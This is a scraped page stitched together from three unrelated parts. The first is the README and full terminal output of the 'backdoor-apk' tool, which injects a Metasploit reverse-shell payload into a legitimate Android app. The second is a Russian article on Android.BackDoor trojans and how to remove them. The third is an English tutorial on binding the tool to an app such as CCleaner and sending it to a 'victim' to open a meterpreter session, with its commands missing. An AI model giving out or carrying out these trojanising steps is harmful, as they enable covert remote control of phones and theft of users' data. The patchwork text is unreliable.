dana-at-cp / backdoor-apk

backdoor-apk is a shell script that simplifies the process of adding a backdoor to any Android APK file. Users of this shell script should have working knowledge of Linux, Bash, Metasploit, Apktool, the Android SDK, smali, etc. This shell script is provided as-is without warranty of any kind and is intended for educational purposes only.

Usage:

root@kali:~/Code/github/backdoor-apk/backdoor-apk# ./backdoor-apk.sh BaiduBrowser.apk            ________          / ______           || _  _ ||          ||| || |||          AAAAAA   PPPPPPP   KKK  KKK          |||_||_|||         AAA  AAA  PPP  PPP  KKK KKK          || _  _o|| (o)     AAA  AAA  PPP  PPP  KKKKKK          ||| || |||         AAAAAAAA  PPPPPPPP  KKK KKK          |||_||_|||         AAA  AAA  PPP       KKK  KKK          ||______||         AAA  AAA  PPP       KKK  KKK         /__________ ________|__________|__________________________________________        /____________        |____________|            Dana James Traversie  [*] Running backdoor-apk.sh v0.2.4a on Fri Sep 28 17:13:37 EDT 2018 [+] Android payload options: 1) meterpreter/reverse_http   4) shell/reverse_http 2) meterpreter/reverse_https  5) shell/reverse_https 3) meterpreter/reverse_tcp    6) shell/reverse_tcp [?] Please select an Android payload option: 2 [?] Please enter an LHOST value: 10.6.9.31 [?] Please enter an LPORT value: 443 [+] Android manifest permission options: 1) Keep original 2) Merge with payload and shuffle [?] Please select an Android manifest permission option: 2 [+] Handle the payload via resource script: msfconsole -r backdoor-apk.rc [*] Decompiling original APK file...done. [*] Locating smali file to hook in original project...done. [+] Package where RAT smali files will be injected: com/baidu/browser/inter [+] Smali file to hook RAT payload: com/baidu/browser/inter/BdApplication.smali [*] Generating RAT APK file...done. [*] Decompiling RAT APK file...done. [*] Merging permissions of original and payload projects...done. [*] Injecting helpful Java classes in RAT APK file...done. [*] Creating new directory in original package for RAT smali files...done. [+] Inject package path: com/baidu/browser/inter/pjese [+] Generated new smali class name for MainBroadcastReceiver.smali: Iivym [+] Generated new smali class name for MainService.smali: Aupyx [+] Generated new smali class name for Payload.smali: Nwiuc [+] Generated new smali class name for StringObfuscator.smali: Abnrw [+] Generated new smali method name for StringObfuscator.obfuscate method: icobf [+] Generated new smali method name for StringObfuscator.unobfuscate method: wbcik [*] Copying RAT smali files to new directories in original project...done. [*] Fixing RAT smali files...done. [*] Obfuscating const-string values in RAT smali files...done. [*] Adding hook in original smali file...done. [*] Adding persistence hook in original project...done. [*] Recompiling original project with backdoor...done. [*] Generating RSA key for signing...done. [*] Signing recompiled APK...done. [*] Verifying signed artifacts...done. [*] Aligning recompiled APK...done. root@kali:~/Code/github/backdoor-apk/backdoor-apk# 

The recompiled APK will be found in the ‘original/dist’ directory. Install the APK on a compatible Android device, run it, and handle the meterpreter connection via the generated resource script: msfconsole -r backdoor-apk.rc

Одним из таких «героев» и является Android.BackDoor – серия троянцев, которые заражают Андроид-устройства (об одном зловреде из этого семейства мы уже рассказывали на нашем сайте). Такие приложения предназначены для выполнения команд, поступающих от злоумышленников – будь то открывание URL, отправка СМС сообщений, сбор информации или загрузка опасных программ.

Что такое Android Backdoor 114 и 183

Android Backdoor 114 origin – одно из самых вредоносных приложений, появившееся совсем недавно. В прошлом году аналитики «Доктор Веб» впервые столкнулись с этой проблемой. Внедряясь в прошивку телефона (планшета), он стал головной болью тысяч пользователей, ведь стандартные способы борьбы здесь зачастую бессильны.

Бэкдор распространяется при помощи:

• безобидных приложений, модифицированных его создателями;
• предустановленного софта на Андроид.

В одном из последних сообщений о заражении, упоминается предустановленное приложение GoogleQuickSearchBox.apk, обнаруженное на планшете Oysters T104 HVi 3G.

Замечено, что троянец Android Backdoor 213 origin может транспортировать рассматриваемый бэкдор. При этом он удаляет одно из оригинальных приложений, находящихся в системном каталоге, а на его место устанавливается измененная версия, в которой находится Android Backdoor 114 origin.

На что же способно вредоносное приложение? Оно может собирать с зараженного объекта различную информацию и отправлять полученные данные на специальный (управляющий) сервер.

Стоит упомянуть, что спектр собираемой информации достаточно широк (зависит от модификации).

Злоумышленникам открывается доступ к следующим данным:

• IMEI-, IMSI-идентификатор и уникальные идентификаторы устройства, МАС-адреса (устройства и Bluetooth-передатчика);
• тип зараженного устройства и версия Андроид;
• параметры из конфигурации зараженного файла и название программного пакета, в котором он находится;
• API-версия операционной системы и тип сетевого подключения;
• перечень программ, которые находятся в системном каталоге или установленные пользователем;
• объем занятого и доступного места на внутренней памяти или флешке;
• название и производитель устройства, идентификатор страны;
• наименование и секретные коды операторов мобильной связи (Mobile Network Code, Mobile Country Code).

Основная же задумка мошенников состоит в том, чтобы обеспечить возможность активации такой опции, как «Установка приложений из неизвестного источника» и незаметная загрузка, а так же неконтролируемое удаление и установка программ.

В результате даже соблюдение всех мер безопасности не спасает владельца зараженного телефона. Бэкдор сумеет изменить необходимые настройки, чтобы загружать всевозможные вредоносные, нежелательные или рекламные приложения.

Например, Android Backdoor 183 origin – характеризуется установкой Time service и Monkey test, которые восстанавливаются после удаления с Андроид. Известен путь к этому приложению: /system/app/providerdown.

Android Backdoor 114 Origin – как удалить

Специалисты утверждают, что стандартные способы не принесут никакого результата. Тогда как удалить Android Backdoor Origin, представляющийся системным файлом? Для этого понадобится:

• приобрести полный root-доступ, что может быть крайне опасно, да и не всегда возможно;
• или установить «чистый» образ операционной системы, которая повлечет за собой потерю всей имеющейся информации, если нет резервной копии.

Общие рекомендации по лечению таковы:

Установить любое антивирусное приложение (к примеру, Dr.Web или avast! Mobile Security) и провести полное сканирование планшета (телефона), чтобы узнать  путь, подлежащий удалению (в случае с Backdoor 114 это, скорее всего, будет /system/app/HTMLViewer.apk/).

Получить полные Root-права (поскольку мы будем иметь дело с системными приложениями);

найти и удалить вредоносный файл по адресу, который указал антивирус с помощью  файлового менеджера, работающего с рут (Root Explorer (File Manager).

Ещё есть возможность (для лицензионных пользователей) — обратиться в службу тех. поддержки того же «Доктор Веб» с просьбой получить утилиту очистки.

Надеемся, что по прочтении этого материала вам удалось нейтрализовать вредоноса, однако владельцам Андроид стоит постоянно быть начеку и выполнять периодически антивирусное сканирование своего устройства, что позволит вовремя выявить и обезвредить опасные программы. Если же вирус обнаружен непосредственно в прошивке, лучше обратиться к производителю телефона (планшета) с просьбой о замене (обновлении) образа ОС.

Вам была интересна эта новость? 15 211 рубрика База знаний, 17.12.2015

Sometimes in hacking, we have to use the most genuine way so that victim is surely hacked. These genuine ways are to be used for our advantage. One of the most genuine ways to hack an android phone is to bind the original android file to your backdoor-apk. This backdoor-apk is software which helps us to bind original apk file with your virus. Hence, taking all the suspicious away from you.

And for this first you have to execute the following command:

Once the command is execution and installation are done then downloads the backdoor-apk from GitHub and for that type:

As the software is downloaded, go to the www.apk4fun.com website and download an original apk file like I downloaded ccleaner. And then copy it in the backdoor-apk folder.

Open it in the terminal and type:

As the command runs it will ask you for the payload you want to use and for that select 3 and then it will ask you for lhost and lport and give these respectively.

The above commands will bind the file to the original apk file and will save it to backdoor-apk>original>dist folder.

Now all you have to do is send the file to the victim as he will install it by clicking on next.

And the click on Install to install the app.

This way the app will be downloaded.

Before opening the app, open Metasploit and type :

After this when you run the app; you will get a meterpreter session.

Hence hacking the victim genuinely.